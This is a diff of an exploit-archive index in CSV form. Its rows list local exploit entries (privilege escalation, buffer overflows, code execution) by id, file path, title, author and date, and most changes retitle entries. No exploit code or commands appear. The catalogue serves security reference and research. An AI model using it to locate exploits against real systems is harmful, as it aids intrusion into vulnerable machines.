+15693,platforms/windows/local/15693.html,"Viscom VideoEdit Gold ActiveX 8.0 - Code Execution",2010-12-06,Rew,windows,local,0 15696,platforms/windows/local/15696.txt,"Alice 2.2 - Arbitrary Code Execution",2010-12-06,Rew,windows,local,0 15704,platforms/linux/local/15704.c,"Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0 15706,platforms/windows/local/15706.txt,"Winamp 5.6 - 'MIDI Parser' Arbitrary Code Execution",2010-12-08,"Kryptos Logic",windows,local,0 @@ -7043,7 +7061,7 @@ id,file,description,date,author,platform,type,port 15774,platforms/linux/local/15774.c,"Linux Kernel < 2.6.37-rc2 - 'ACPI custom_method' Privilege Escalation",2010-12-18,"Jon Oberheide",linux,local,0 15782,platforms/windows/local/15782.pl,"Word Splash Pro 9.5 - Buffer Overflow",2010-12-20,h1ch4m,windows,local,0 15785,platforms/windows/local/15785.py,"MP3 CD Converter Professional - Buffer Overflow (SEH)",2010-12-20,"C4SS!0 G0M3S",windows,local,0 -15855,platforms/windows/local/15855.py,"Digital Music Pad 8.2.3.4.8 - '.pls' Overflow (SEH)",2010-12-29,"Abhishek Lyall",windows,local,0 +15855,platforms/windows/local/15855.py,"Digital Music Pad 8.2.3.4.8 - '.pls' Local Overflow (SEH)",2010-12-29,"Abhishek Lyall",windows,local,0 15895,platforms/windows/local/15895.py,"CoolPlayer 2.18 - DEP Bypass",2011-01-02,blake,windows,local,0 15888,platforms/windows/local/15888.c,"Bywifi 2.8.1 - Stack Buffer Overflow",2011-01-01,anonymous,windows,local,0 15901,platforms/windows/local/15901.py,"Music Animation Machine MIDI Player - Buffer Overflow (SEH)",2011-01-04,Acidgen,windows,local,0 @@ -7137,7 +7155,7 @@ id,file,description,date,author,platform,type,port 16664,platforms/windows/local/16664.rb,"gAlan 0.2.1 - Buffer Overflow (Metasploit) (2)",2010-09-25,Metasploit,windows,local,0 16665,platforms/windows/local/16665.rb,"Microsoft PowerPoint Viewer - TextBytesAtom Stack Buffer Overflow (MS10-004) (Metasploit)",2010-09-25,Metasploit,windows,local,0 16666,platforms/windows/local/16666.rb,"UltraISO - '.CCD' File Parsing Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0 -16667,platforms/windows/local/16667.rb,"Adobe Flash Player - 'Button' Remote Code Execution (Metasploit)",2010-11-01,Metasploit,windows,local,0 +16667,platforms/windows/local/16667.rb,"Adobe Flash Player - 'Button' Arbitrary Code Execution (Metasploit)",2010-11-01,Metasploit,windows,local,0 16668,platforms/windows/local/16668.rb,"BACnet OPC Client - Buffer Overflow (Metasploit) (2)",2010-11-14,Metasploit,windows,local,0 16669,platforms/windows/local/16669.rb,"Adobe Illustrator CS4 14.0.0 - Postscript (.eps) Buffer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0 16670,platforms/windows/local/16670.rb,"Adobe Acrobat - Bundled LibTIFF Integer Overflow (Metasploit)",2010-09-25,Metasploit,windows,local,0 @@ -7169,7 +7187,7 @@ id,file,description,date,author,platform,type,port 16999,platforms/windows/local/16999.rb,"POP Peeper 3.7 - Overflow (SEH)",2011-03-18,"Anastasios Monachos",windows,local,0 17001,platforms/windows/local/17001.pl,"CORE MultiMedia Suite 2011 CORE Player 2.4 - '.m3u' Buffer Overflow",2011-03-18,Rh0,windows,local,0 17012,platforms/windows/local/17012.py,"Mediacoder 2011 RC3 - '.m3u' Buffer Overflow",2011-03-20,"Oh Yaw Theng",windows,local,0 -17013,platforms/windows/local/17013.pl,"MPlayer Lite r33064 - '.m3u' Overflow (SEH)",2011-03-20,"C4SS!0 & h1ch4m",windows,local,0 +17013,platforms/windows/local/17013.pl,"MPlayer Lite r33064 - '.m3u' Local Overflow (SEH)",2011-03-20,"C4SS!0 & h1ch4m",windows,local,0 17064,platforms/windows/local/17064.py,"IDEAL Administration 2011 11.4 - Local Buffer Overflow (SEH)",2011-03-29,Dr_IDE,windows,local,0 17083,platforms/linux/local/17083.pl,"HT Editor 2.0.18 - File Opening Stack Overflow",2011-03-30,ZadYree,linux,local,0 17086,platforms/windows/local/17086.pl,"Word List Builder - Buffer Overflow (SEH)",2011-04-01,h1ch4m,windows,local,0 @@ -7260,7 +7278,7 @@ id,file,description,date,author,platform,type,port 17932,platforms/linux/local/17932.c,"PolicyKit polkit-1 < 0.101 - Privilege Escalation",2011-10-05,zx2c4,linux,local,0 17939,platforms/windows/local/17939.py,"BlazeVideo HDTV Player 6.6 Professional - Universal ASLR + DEP Bypass",2011-10-07,modpr0be,windows,local,0 17942,platforms/linux/local/17942.c,"pkexec - Race Condition Privilege Escalation",2011-10-08,xi4oyu,linux,local,0 -17966,platforms/windows/local/17966.rb,"ACDSee FotoSlate - '.PLP' File 'id' Overflow (Metasploit)",2011-10-10,Metasploit,windows,local,0 +17966,platforms/windows/local/17966.rb,"ACDSee FotoSlate - '.PLP' File 'id' Local Overflow (Metasploit)",2011-10-10,Metasploit,windows,local,0 17967,platforms/windows/local/17967.rb,"TugZip 3.5 Archiver - '.ZIP' File Parsing Buffer Overflow (Metasploit)",2011-10-11,Metasploit,windows,local,0 17985,platforms/windows/local/17985.rb,"Real Networks Netzip Classic 7.5.1 86 - File Parsing Buffer Overflow (Metasploit)",2011-10-16,Metasploit,windows,local,0 18040,platforms/linux/local/18040.c,"Xorg 1.4 < 1.11.2 - File Permission Change (PoC)",2011-10-28,vladz,linux,local,0 @@ -7335,11 +7353,12 @@ id,file,description,date,author,platform,type,port 18947,platforms/windows/local/18947.rb,"ispVM System - '.XCF' File Handling Overflow (Metasploit)",2012-05-29,Metasploit,windows,local,0 18954,platforms/windows/local/18954.rb,"MPlayer - '.SAMI' Subtitle File Buffer Overflow (Metasploit)",2012-05-30,Metasploit,windows,local,0 18959,platforms/multiple/local/18959.txt,"Browsers Browsers - Navigation Download Trick",2012-05-31,"Michal Zalewski",multiple,local,0 -19006,platforms/windows/local/19006.py,"Lattice Semiconductor PAC-Designer 6.21 - '.PAC' Overflow",2012-06-07,b33f,windows,local,0 +19006,platforms/windows/local/19006.py,"Lattice Semiconductor PAC-Designer 6.21 - '.PAC' Local Overflow",2012-06-07,b33f,windows,local,0 19037,platforms/windows/local/19037.rb,"Microsoft Office - ClickOnce Unsafe Object Package Handling (MS12-005) (Metasploit)",2012-06-11,Metasploit,windows,local,0 19041,platforms/aix/local/19041.txt,"Digital Ultrix 4.0/4.1 - '/usr/bin/chroot' Privilege Escalation",1991-05-01,anonymous,aix,local,0 19042,platforms/solaris/local/19042.txt,"SunOS 4.1.1 - '/usr/release/bin/makeinstall' Privilege Escalation",1999-11-23,anonymous,solaris,local,0 19043,platforms/aix/local/19043.txt,"SunOS 4.1.1 - '/usr/release/bin/winstall' Privilege Escalation",1999-11-12,anonymous,aix,local,0 +19045,platforms/aix/local/19045.txt,"SunOS 4.1.3 - '/etc/crash' SetGID kmem Privilege Escalation",1993-02-03,anonymous,aix,local,0 19066,platforms/irix/local/19066.txt,"SGI IRIX 5.3/6.2 / SGI license_oeo 1.0 LicenseManager - 'NETLS_LICENSE_FILE' Privilege Escalation",1996-04-05,"Arthur Hagen",irix,local,0 19067,platforms/irix/local/19067.txt,"SGI IRIX 6.4 / SGI license_oeo 3.0/3.1/3.1.1 LicenseManager - 'LICENSEMGR_FILE_ROOT' Privilege Escalation",1996-11-22,"Yuri Volobuev",irix,local,0 19068,platforms/unix/local/19068.txt,"Digital UNIX 4.0/4.0 B/4.0 D - SUID/SGID Core File",1998-04-06,"ru5ty & SoReN",unix,local,0 @@ -7357,33 +7376,32 @@ id,file,description,date,author,platform,type,port 19122,platforms/linux/local/19122.txt,"Slackware Linux 3.5 - '/etc/group' Privilege Escalation",1998-07-13,"Richard Thomas",linux,local,0 19125,platforms/linux/local/19125.txt,"Oracle 8 - oratclsh Suid",1999-04-29,"Dan Sugalski",linux,local,0 19126,platforms/solaris/local/19126.txt,"Sun Solaris 2.6 - power management",1998-07-16,"Ralf Lehmann",solaris,local,0 -19128,platforms/solaris/local/19128.c,"Sun Solaris 7.0 - '/usr/dt/bin/sdtcm_convert' Overflow / Privilege Escalation",1998-10-23,UNYUN,solaris,local,0 +19128,platforms/solaris/local/19128.c,"Sun Solaris 7.0 - '/usr/dt/bin/sdtcm_convert' Local Overflow / Privilege Escalation",1998-10-23,UNYUN,solaris,local,0 19138,platforms/windows/local/19138.txt,"ESRI ArcGIS 10.0.x / ArcMap 9 - Arbitrary Code Execution",2012-06-14,"Boston Cyber Defense",windows,local,0 19139,platforms/multiple/local/19139.py,"Adobe Illustrator CS5.5 - Memory Corruption",2012-06-14,"Felipe Andres Manzano",multiple,local,0 19142,platforms/linux/local/19142.sh,"Oracle 8 - File Access",1999-05-06,"Kevin Wenchel",linux,local,0 -19143,platforms/windows/local/19143.c,"Microsoft Windows - 'April Fools 2001'",1999-01-07,"Richard M. Smith",windows,local,0 +19143,platforms/windows/local/19143.c,"Microsoft Windows - 'April Fools 2001' Set Incorrect Date",1999-01-07,"Richard M. Smith",windows,local,0 19144,platforms/windows/local/19144.txt,"Microsoft Zero Administration Kit (ZAK) 1.0 / Office97 - Backdoor Access",1999-01-07,"Satu Laksela",windows,local,0 19145,platforms/windows/local/19145.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4 - Server Operator to Administrator Privilege Escalation: System Key",1999-01-11,Mnemonix,windows,local,0 19146,platforms/linux/local/19146.sh,"DataLynx suGuard 1.0 - Privilege Escalation",1999-01-03,"Dr. Mudge",linux,local,0 19158,platforms/solaris/local/19158.c,"Sun Solaris 2.5.1 PAM / unix_scheme - 'passwd' Privilege Escalation",1997-02-25,"Cristian Schipor",solaris,local,0 19159,platforms/solaris/local/19159.c,"Solaris 2.5.1 - 'ffbconfig' Privilege Escalation",1997-02-10,"Cristian Schipor",solaris,local,0 19160,platforms/solaris/local/19160.c,"Solaris 2.5.1 - 'chkey' Privilege Escalation",1997-05-19,"Adam Morrison",solaris,local,0 -19161,platforms/solaris/local/19161.txt,"Solaris 2.5.1 - 'Ping'",1997-06-15,"Adam Caldwell",solaris,local,0 19163,platforms/irix/local/19163.sh,"SGI IRIX 6.4 - 'ioconfig' Privilege Escalation",1998-07-20,Loneguard,irix,local,0 19167,platforms/windows/local/19167.txt,"Ipswitch IMail 5.0 / Ipswitch WS_FTP Server 1.0.1/1.0.2 - Privilege Escalation",1999-02-04,Marc,windows,local,0 19168,platforms/unix/local/19168.sh,"SGI IRIX 6.5.4 / Solaris 2.5.1 - ps(1) Buffer Overflow",1997-04-28,"Joe Zbiciak",unix,local,0 -19172,platforms/unix/local/19172.c,"BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - 'xlock' Overflow / Privilege Escalation (1)",1997-04-26,cesaro,unix,local,0 +19172,platforms/unix/local/19172.c,"BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - 'xlock' Local Overflow / Privilege Escalation (1)",1997-04-26,cesaro,unix,local,0 19173,platforms/unix/local/19173.c,"BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - '/usr/bin/X11/xlock' Privilege Escalation (2)",1997-04-26,BeastMaster,unix,local,0 19175,platforms/windows/local/19175.rb,"Lattice Semiconductor PAC-Designer 6.21 - Symbol Value Buffer Overflow (Metasploit)",2012-06-17,Metasploit,windows,local,0 19176,platforms/windows/local/19176.rb,"TFM MMPlayer - '.m3u' / '.ppl' Buffer Overflow (Metasploit)",2012-06-15,Metasploit,windows,local,0 19192,platforms/windows/local/19192.txt,"Hancom Office 2007 - 'Reboot.ini' Clear-Text Passwords",1999-02-09,"Russ Cooper",windows,local,0 19195,platforms/windows/local/19195.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 - LSA Secrets",1997-07-16,"Paul Ashton",windows,local,0 -19196,platforms/windows/local/19196.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - RAS Dial-up Networking 'Save Password'",1998-03-19,"Martin Dolphin",windows,local,0 +19196,platforms/windows/local/19196.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - RAS Dial-up Networking Save Password",1998-03-19,"Martin Dolphin",windows,local,0 19198,platforms/windows/local/19198.txt,"Microsoft Windows NT 4.0 SP4 - Known DLL Cache",1999-02-18,L0pht,windows,local,0 19199,platforms/solaris/local/19199.c,"Solaris 2.5.1 - 'automount' Privilege Escalation",1997-11-26,anonymous,solaris,local,0 -19200,platforms/unix/local/19200.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Overflow / Privilege Escalation (1)",1997-08-25,bloodmask,unix,local,0 -19201,platforms/unix/local/19201.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Overflow / Privilege Escalation (2)",1997-08-25,jGgM,unix,local,0 -19202,platforms/unix/local/19202.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Overflow / Privilege Escalation (3)",1997-08-25,jGgM,unix,local,0 +19200,platforms/unix/local/19200.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Privilege Escalation (1)",1997-08-25,bloodmask,unix,local,0 +19201,platforms/unix/local/19201.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Privilege Escalation (2)",1997-08-25,jGgM,unix,local,0 +19202,platforms/unix/local/19202.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Privilege Escalation (3)",1997-08-25,jGgM,unix,local,0 19203,platforms/unix/local/19203.c,"BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - 'rlogin' Privilege Escalation",1996-12-04,"Roger Espel Llima",unix,local,0 19205,platforms/solaris/local/19205.c,"Sun Solaris 7.0 - '/usr/dt/bin/dtprintinfo' Buffer Overflow",1999-05-10,UNYUN@ShadowPenguin,solaris,local,0 19206,platforms/solaris/local/19206.c,"Sun Solaris 7.0 - '/usr/bin/lpset' Buffer Overflow",1999-05-11,"kim yong-jun",solaris,local,0 @@ -7395,34 +7413,34 @@ id,file,description,date,author,platform,type,port 19215,platforms/aix/local/19215.c,"IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (3)",1999-05-22,UNYUN,aix,local,0 19216,platforms/aix/local/19216.c,"IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (4)",1999-05-22,ahmed@securityfocus.com,aix,local,0 19217,platforms/aix/local/19217.c,"IBM AIX 4.2.1 / Sun Solaris 7.0 - LC_MESSAGES libc Buffer Overflow (5)",1999-05-22,UNYUN,aix,local,0 -19220,platforms/windows/local/19220.c,"Allaire ColdFusion Server 4.0.1 - 'CFCRYPT.EXE'",1998-05-19,"Matt Chapman",windows,local,0 +19220,platforms/windows/local/19220.c,"Allaire ColdFusion Server 4.0.1 - 'CFCRYPT.EXE' Decrypt Pages",1998-05-19,"Matt Chapman",windows,local,0 19227,platforms/windows/local/19227.txt,"IBM Remote Control Software 1.0 - Code Execution",1999-05-10,"Thomas Krug",windows,local,0 19229,platforms/aix/local/19229.txt,"IBM AIX eNetwork Firewall 3.2/3.3 - Insecure Temporary File Creation",1999-05-25,"Paul Cammidge",aix,local,0 19232,platforms/solaris/local/19232.txt,"SunOS 4.1.4 - arp(8c) Memory Dump",1994-02-01,anonymous,solaris,local,0 19233,platforms/solaris/local/19233.txt,"Solaris 7.0 - aspppd Insecure Temporary File Creation",1996-12-20,Al-Herbish,solaris,local,0 19234,platforms/solaris/local/19234.c,"Solaris 7.0 - 'cancel' Privilege Escalation",1999-03-05,"Josh A. Strickland",solaris,local,0 -19235,platforms/solaris/local/19235.txt,"Solaris 7.0 - 'chkperm'",1996-12-05,"Kevin L Prigge",solaris,local,0 +19235,platforms/solaris/local/19235.txt,"Solaris 7.0 - 'chkperm' Privilege Escalation",1996-12-05,"Kevin L Prigge",solaris,local,0 19240,platforms/linux/local/19240.c,"Caldera kdenetwork 1.1.1-1 / Caldera OpenLinux 1.3/2.2 / KDE KDE 1.1/1.1. / RedHat Linux 6.0 - K-Mail File Creation",1999-06-09,"Brian Mitchell",linux,local,0 19243,platforms/linux/local/19243.txt,"G. Wilford man 2.3.10 - Symlink",1999-06-02,"Thomas Fischbacher",linux,local,0 19244,platforms/osx/local/19244.sh,"Apple Mac OSX Server 10.0 - Overload",1999-06-03,"Juergen Schmidt",osx,local,0 19249,platforms/linux/local/19249.c,"Xcmail 0.99.6 - Buffer Overflow",1999-03-02,Arthur,linux,local,0 19401,platforms/windows/local/19401.txt,"Apple QuickTime - QuickTime.util.QTByteObject Initialization Security Checks Bypass",2012-06-26,"Security Explorations",windows,local,0 -19254,platforms/linux/local/19254.c,"S.u.S.E. Linux 5.2 - 'gnuplot'",1999-03-04,xnec,linux,local,0 +19254,platforms/linux/local/19254.c,"S.u.S.E Linux 5.2 - 'gnuplot' Local Overflow / Privilege Escalation",1999-03-04,xnec,linux,local,0 19255,platforms/linux/local/19255.txt,"RedHat Linux 5.2 i386/6.0 - No Logging",1999-06-09,"Tani Hosokawa",linux,local,0 19256,platforms/linux/local/19256.c,"Stanford University bootpd 2.4.3 / Debian 2.0 - netstd",1999-01-03,anonymous,linux,local,0 19257,platforms/linux/local/19257.c,"X11R6 3.3.3 - Symlink",1999-03-21,Stealthf0rk,linux,local,0 19258,platforms/solaris/local/19258.sh,"Sun Solaris 7.0 - 'ff.core' Privilege Escalation",1999-01-07,"John McDonald",solaris,local,0 -19259,platforms/linux/local/19259.c,"S.u.S.E. 5.2 - 'lpc' Privilege Escalation",1999-02-03,xnec,linux,local,0 +19259,platforms/linux/local/19259.c,"S.u.S.E Linux 5.2 - 'lpc' Privilege Escalation",1999-02-03,xnec,linux,local,0 19260,platforms/irix/local/19260.sh,"SGI IRIX 6.2 - '/usr/lib/netaddpr' Privilege Escalation",1997-05-09,"Jaechul Choe",irix,local,0 -19261,platforms/netbsd_x86/local/19261.txt,"NetBSD 1.3.2 / SGI IRIX 6.5.1 - 'at(1)'",1998-06-27,Gutierrez,netbsd_x86,local,0 +19261,platforms/netbsd_x86/local/19261.txt,"NetBSD 1.3.2 / SGI IRIX 6.5.1 - 'at(1)' Read File",1998-06-27,Gutierrez,netbsd_x86,local,0 19262,platforms/irix/local/19262.txt,"SGI IRIX 6.2 - 'cdplayer' Privilege Escalation",1996-11-21,"Yuri Volobuev",irix,local,0 19267,platforms/irix/local/19267.c,"SGI IRIX 6.3 - xrm Buffer Overflow",1997-05-27,"David Hedley",irix,local,0 19268,platforms/irix/local/19268.txt,"SGI IRIX 5.3 - 'Cadmin' Privilege Escalation",1996-08-06,"Grant Kaufmann",irix,local,0 -19269,platforms/irix/local/19269.txt,"SGI IRIX 6.0.1 - 'colorview'",1995-02-09,"Dave Sill",irix,local,0 +19269,platforms/irix/local/19269.txt,"SGI IRIX 6.0.1 - 'colorview' Read Files",1995-02-09,"Dave Sill",irix,local,0 19270,platforms/linux/local/19270.c,"Debian 2.0 - Super Syslog Buffer Overflow",1999-02-25,c0nd0r,linux,local,0 -19273,platforms/irix/local/19273.sh,"SGI IRIX 6.2 - 'day5notifier'",1997-05-16,"Mike Neuman",irix,local,0 +19273,platforms/irix/local/19273.sh,"SGI IRIX 6.2 - 'day5notifier' Privilege Escalation",1997-05-16,"Mike Neuman",irix,local,0 19274,platforms/irix/local/19274.c,"SGI IRIX 6.3 - 'df' Privilege Escalation",1997-05-24,"David Hedley",irix,local,0 -19275,platforms/irix/local/19275.txt,"SGI IRIX 6.4 - 'datman'/'cdman'",1996-12-09,"Yuri Volobuev",irix,local,0 +19275,platforms/irix/local/19275.txt,"SGI IRIX 6.4 - 'datman'/'cdman' Privilege Escalation",1996-12-09,"Yuri Volobuev",irix,local,0 19276,platforms/irix/local/19276.c,"SGI IRIX 6.2 - 'eject' Privilege Escalation (1)",1997-05-25,DCRH,irix,local,0 19277,platforms/irix/local/19277.c,"SGI IRIX 6.2 - 'eject' Privilege Escalation (2)",1997-05-25,"Last Stage of Delirium",irix,local,0 19279,platforms/linux/local/19279.sh,"RedHat Linux 2.1 - 'abuse.console' Privilege Escalation",1996-02-02,"David J Meltzer",linux,local,0 @@ -7442,7 +7460,7 @@ id,file,description,date,author,platform,type,port 19306,platforms/aix/local/19306.c,"IBM AIX 4.2.1 - '/usr/bin/portmir' Buffer Overflow / Insecure Temporary File Creation",1997-10-29,"BM ERS Team",aix,local,0 19307,platforms/aix/local/19307.c,"IBM AIX 4.2 - 'ping' Buffer Overflow",1997-07-21,"Bryan P. Self",aix,local,0 19309,platforms/aix/local/19309.c,"IBM AIX 4.2 - '/usr/sbin/lchangelv' Buffer Overflow",1997-07-21,"Bryan P. Self",aix,local,0 -19310,platforms/irix/local/19310.c,"SGI IRIX 6.4 - 'login'",1997-05-26,"David Hedley",irix,local,0 +19310,platforms/irix/local/19310.c,"SGI IRIX 6.4 - 'login' Privilege Escalation",1997-05-26,"David Hedley",irix,local,0 19311,platforms/linux/local/19311.c,"RedHat Linux 4.2 / SGI IRIX 6.3 / Solaris 2.6 - 'mailx' (1)",1998-06-20,"Alvaro Martinez Echevarria",linux,local,0 19312,platforms/linux/local/19312.c,"RedHat Linux 4.2 / SGI IRIX 6.3 / Solaris 2.6 - 'mailx' (2)",1998-06-25,segv,linux,local,0 19313,platforms/irix/local/19313.txt,"SGI IRIX 6.4 - 'netprint' Privilege Escalation",1997-01-04,"Yuri Volobuev",irix,local,0 @@ -7461,11 +7479,11 @@ id,file,description,date,author,platform,type,port 19345,platforms/aix/local/19345.txt,"IBM AIX 4.2.1 - 'lquerypv' File Read",1996-11-24,Aleph1,aix,local,0 19346,platforms/freebsd/local/19346.c,"FreeBSD 3.1 / Solaris 2.6 - Domain Socket",1997-06-19,"Thamer Al-Herbish",freebsd,local,0 19347,platforms/irix/local/19347.c,"SGI IRIX 6.3 - 'pset' Privilege Escalation",1997-07-17,"Last Stage of Delirium",irix,local,0 -19349,platforms/irix/local/19349.txt,"SGI IRIX 6.4 - 'rmail'",1997-05-07,"Yuri Volobuev",irix,local,0 +19349,platforms/irix/local/19349.txt,"SGI IRIX 6.4 - 'rmail' Privilege Escalation",1997-05-07,"Yuri Volobuev",irix,local,0 19350,platforms/solaris/local/19350.sh,"Solaris 2.5.1 - License Manager",1998-10-21,"Joel Eriksson",solaris,local,0 19351,platforms/irix/local/19351.sh,"SGI IRIX 5.2/5.3 - 'serial_ports' Privilege Escalation",1994-02-02,transit,irix,local,0 19353,platforms/irix/local/19353.txt,"SGI IRIX 6.4 - 'suid_exec' Privilege Escalation",1996-12-02,"Yuri Volobuev",irix,local,0 -19354,platforms/aix/local/19354.txt,"SGI IRIX 5.1/5.2 - 'sgihelp'",1996-12-02,anonymous,aix,local,0 +19354,platforms/aix/local/19354.txt,"SGI IRIX 5.1/5.2 - 'sgihelp' Privilege Escalation",1996-12-02,anonymous,aix,local,0 19355,platforms/irix/local/19355.txt,"SGI IRIX 6.4 - 'startmidi' Privilege Escalation",1997-02-09,"David Hedley",irix,local,0 19356,platforms/irix/local/19356.txt,"SGI IRIX 6.3 - 'Systour' / 'OutOfBox' Privilege Escalation",1996-10-30,"Tun-Hui Hu",irix,local,0 19358,platforms/irix/local/19358.txt,"SGI IRIX 6.4 - 'xfsdump' Privilege Escalation",1997-05-07,"Yuri Volobuev",irix,local,0 @@ -7476,8 +7494,8 @@ id,file,description,date,author,platform,type,port 19384,platforms/linux/local/19384.c,"Debian 2.1 - Print Queue Control",1999-07-02,"Chris Leishman",linux,local,0 19370,platforms/linux/local/19370.c,"Xi Graphics Accelerated X 4.0.x/5.0 - Buffer Overflow",1999-06-25,KSR[T],linux,local,0 19371,platforms/linux/local/19371.c,"VMware 1.0.1 - Buffer Overflow",1999-06-25,funkysh,linux,local,0 -19373,platforms/linux/local/19373.c,"Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - 'Lsof' Buffer Overflow (1)",1999-02-17,c0nd0r,linux,local,0 -19374,platforms/linux/local/19374.c,"Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - 'Lsof' Buffer Overflow (2)",1999-02-17,Zhodiac,linux,local,0 +19373,platforms/linux/local/19373.c,"Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E 6.1 - 'Lsof' Buffer Overflow (1)",1999-02-17,c0nd0r,linux,local,0 +19374,platforms/linux/local/19374.c,"Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E 6.1 - 'Lsof' Buffer Overflow (2)",1999-02-17,Zhodiac,linux,local,0 19376,platforms/windows/local/19376.txt,"Microsoft IIS 2.0/3.0/4.0 - ISAPI GetExtensionVersion()",1999-03-08,"Fabien Royer",windows,local,0 19417,platforms/osx/local/19417.txt,"Apple Mac OS 8 8.6 - Weak Password Encryption",1999-07-10,"Dawid adix Adamski",osx,local,0 19418,platforms/aix/local/19418.txt,"IBM AIX 4.3.1 - 'adb' Denial of Service",1999-07-12,"GZ Apple",aix,local,0 @@ -7501,22 +7519,22 @@ id,file,description,date,author,platform,type,port 19464,platforms/linux/local/19464.c,"RedHat Linux 6.0 / Slackware Linux 4.0 - Termcap 'tgetent()' Buffer Overflow (1)",1999-08-18,m0f0,linux,local,0 19465,platforms/linux/local/19465.c,"RedHat Linux 6.0 / Slackware Linux 4.0 - Termcap 'tgetent()' Buffer Overflow (2)",1999-08-18,sk8,linux,local,0 19467,platforms/linux/local/19467.c,"GNU glibc 2.1/2.1.1 -6 - 'pt_chown' Privilege Escalation",1999-08-23,"Michal Zalewski",linux,local,0 -19469,platforms/linux/local/19469.c,"RedHat Linux 4.2/5.2/6.0 / S.u.S.E. Linux 6.0/6.1 - Cron Buffer Overflow (1)",1999-08-30,Akke,linux,local,0 -19470,platforms/linux/local/19470.c,"RedHat Linux 4.2/5.2/6.0 / S.u.S.E. Linux 6.0/6.1 - Cron Buffer Overflow (2)",1999-08-25,jbowie,linux,local,0 +19469,platforms/linux/local/19469.c,"RedHat Linux 4.2/5.2/6.0 / S.u.S.E Linux 6.0/6.1 - Cron Buffer Overflow (1)",1999-08-30,Akke,linux,local,0 +19470,platforms/linux/local/19470.c,"RedHat Linux 4.2/5.2/6.0 / S.u.S.E Linux 6.0/6.1 - Cron Buffer Overflow (2)",1999-08-25,jbowie,linux,local,0 19472,platforms/windows/local/19472.txt,"IBM GINA for NT 1.0 - Privilege Escalation",1999-08-23,"Frank Pikelner",windows,local,0 19473,platforms/windows/local/19473.txt,"Microsoft Internet Explorer 5 - FTP Password Storage",1999-08-25,"Makoto Shiotsuki",windows,local,0 19474,platforms/linux/local/19474.txt,"Caldera OpenLinux 2.2 / Debian 2.1/2.2 / RedHat 6.0 - Vixie Cron MAILTO Sendmail",1999-08-25,"Olaf Kirch",linux,local,0 19480,platforms/multiple/local/19480.c,"ISC INN 2.2 / RedHat Linux 6.0 - inews Buffer Overflow",1999-09-02,bawd,multiple,local,0 19485,platforms/linux/local/19485.c,"Martin Stover Mars NWE 0.99 - Buffer Overflow",1999-08-31,"Przemyslaw Frasunek",linux,local,0 19497,platforms/multiple/local/19497.c,"DIGITAL UNIX 4.0 d/e/f / AIX 4.3.2 / CDE 2.1 / IRIX 6.5.14 / Solaris 7.0 - Buffer Overflow",1999-09-13,"Job de Haas of ITSX",multiple,local,0 -19498,platforms/multiple/local/19498.sh,"Common Desktop Environment 2.1 20 / Solaris 7.0 - 'dtspcd'",1999-09-13,"Job de Haas of ITSX",multiple,local,0 +19498,platforms/multiple/local/19498.sh,"Common Desktop Environment 2.1 20 / Solaris 7.0 - 'dtspcd' Privilege Escalation",1999-09-13,"Job de Haas of ITSX",multiple,local,0 19499,platforms/linux/local/19499.c,"SCO Open Server 5.0.5 - X Library Buffer Overflow (1)",1999-09-09,"Brock Tellier",linux,local,0 19500,platforms/linux/local/19500.c,"SCO Open Server 5.0.5 - X Library Buffer Overflow (2)",1999-06-21,"The Dark Raver of CPNE",linux,local,0 